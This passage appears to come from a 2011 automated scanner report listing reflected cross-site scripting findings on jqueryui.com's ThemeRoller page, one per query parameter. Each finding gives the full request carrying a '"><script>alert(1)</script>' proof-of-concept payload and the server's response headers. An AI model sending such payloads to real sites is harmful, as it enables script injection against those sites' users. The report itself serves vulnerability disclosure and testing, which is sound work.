GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png88dc1"><script>alert(1)</script>9cc354f2545&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba767"><script>alert(1)</script>03801eccdd0 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngba767"><script>alert(1)</script>03801eccdd0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccc3"><script>alert(1)</script>e86fd8486e8 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png5ccc3"><script>alert(1)</script>e86fd8486e8&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ac1"><script>alert(1)</script>9210ea66bdf was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png84ac1"><script>alert(1)</script>9210ea66bdf&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6f9"><script>alert(1)</script>abe1a9372d2 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pngaf6f9"><script>alert(1)</script>abe1a9372d2&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903d0"><script>alert(1)</script>89f58c5876 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa903d0"><script>alert(1)</script>89f58c5876&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120064
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1346"><script>alert(1)</script>16a6bea7164 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c1346"><script>alert(1)</script>16a6bea7164&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d68b"><script>alert(1)</script>0e99ffd0389 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa2d68b"><script>alert(1)</script>0e99ffd0389&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfb0"><script>alert(1)</script>e226ef94aa6 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999acfb0"><script>alert(1)</script>e226ef94aa6&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f528"><script>alert(1)</script>f39ca9e48a0 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px8f528"><script>alert(1)</script>f39ca9e48a0&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a2d"><script>alert(1)</script>35caf979a58 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222254a2d"><script>alert(1)</script>35caf979a58&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173b0"><script>alert(1)</script>2ec4079e8df was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555173b0"><script>alert(1)</script>2ec4079e8df&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e4b"><script>alert(1)</script>b72aaf12bf1 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222214e4b"><script>alert(1)</script>b72aaf12bf1&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c90a7"><script>alert(1)</script>c7e036c9077 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
